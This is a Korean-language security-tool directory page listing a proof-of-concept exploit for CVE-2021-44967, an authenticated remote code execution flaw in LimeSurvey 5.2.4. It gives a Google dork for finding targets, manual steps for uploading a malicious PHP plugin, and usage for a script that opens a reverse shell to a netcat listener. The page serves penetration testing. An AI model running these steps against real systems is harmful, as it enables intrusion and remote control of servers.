Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-44967 — CVE-2021-44967용 POC 익스플로잇 | Kitploit
도구/GitHubGitHub/d3ext/cve-2021-44967
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubd3ext/cve-2021-44967

CVE-2021-44967

CVE-2021-44967용 POC 익스플로잇

저장소 보기
611년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2021-44967

root@kitploit:~
# Exploit Title: LimeSurvey 5.2.4 - Authenticated Remote Code Execution (RCE)
# Google Dork: inurl:limesurvey/index.php/admin/authentication/sa/login
# Date: 05/12/2021
# Discovered by: Y1LD1R1M
# Exploit Author: D3Ext
# Vendor Homepage: https://www.limesurvey.org/
# Software Link: https://download.limesurvey.org/latest-stable-release/limesurvey5.2.4+211129.zip
# Version: 5.2.x
# Tested on: Kali Linux 2025
# CVE: CVE-2021-44967

설명

LimeSurvey 5.2.4에는 업로드 및 설치 플러그인 기능을 통해 원격 코드 실행(RCE) 취약점이 존재하며, 이는 원격의 악성 사용자가 임의의 PHP 코드 파일을 업로드할 수 있게 합니다.

다음은 이 취약점을 수동으로 악용하기 위해 따라야 할 단계입니다:

  1. PHP 파일과 설정 파일이 포함된 ZIP을 생성합니다.
  2. LimeSurvey에 로그인합니다.
  3. 설정 -> 플러그인 -> 업로드 및 설치로 이동합니다.
  4. ZIP 파일을 업로드합니다.
  5. 설치합니다.
  6. 마지막으로 플러그인을 활성화합니다.
  7. 그러면 PHP 코드가 /upload/plugins/<plugin_name>/<php_file>에서 접근 가능해야 합니다.

사용법

root@kitploit:~
usage: CVE-2021-44967.py [-h] --url URL --user USER --password PASSWORD --lhost LHOST --lport LPORT [--verbose]

CVE-2021-44967 - LimeSurvey Authenticated RCE

options:
  -h, --help           show this help message and exit
  --url URL            URL of the LimeSurvey web root
  --user USER          username to log in
  --password PASSWORD  password of the username
  --lhost LHOST        local host to receive the reverse shell
  --lport LPORT        local port to receive the reverse shell
  --verbose            enable verbose

netcat 리스너를 시작한 후 다음과 같이 익스플로잇을 실행합니다:

root@kitploit:~
python3 --url <URL> --user <username> --password <password> --lhost <local host> --lport <local port>

데모

참고 자료

root@kitploit:~
https://github.com/Y1LD1R1M-1337/Limesurvey-RCE
https://www.exploit-db.com/exploits/50573
https://github.com/p0dalirius/LimeSurvey-webshell-plugin
https://ine.com/blog/cve-2021-44967-limesurvey-rce
https://pentest-tools.com/vulnerabilities-exploits/limesurvey-524-rce-vulnerability_13029

라이선스

이 프로젝트는 MIT 라이선스 하에 있습니다.

저작권 © 2025, D3Ext

도구 다운로드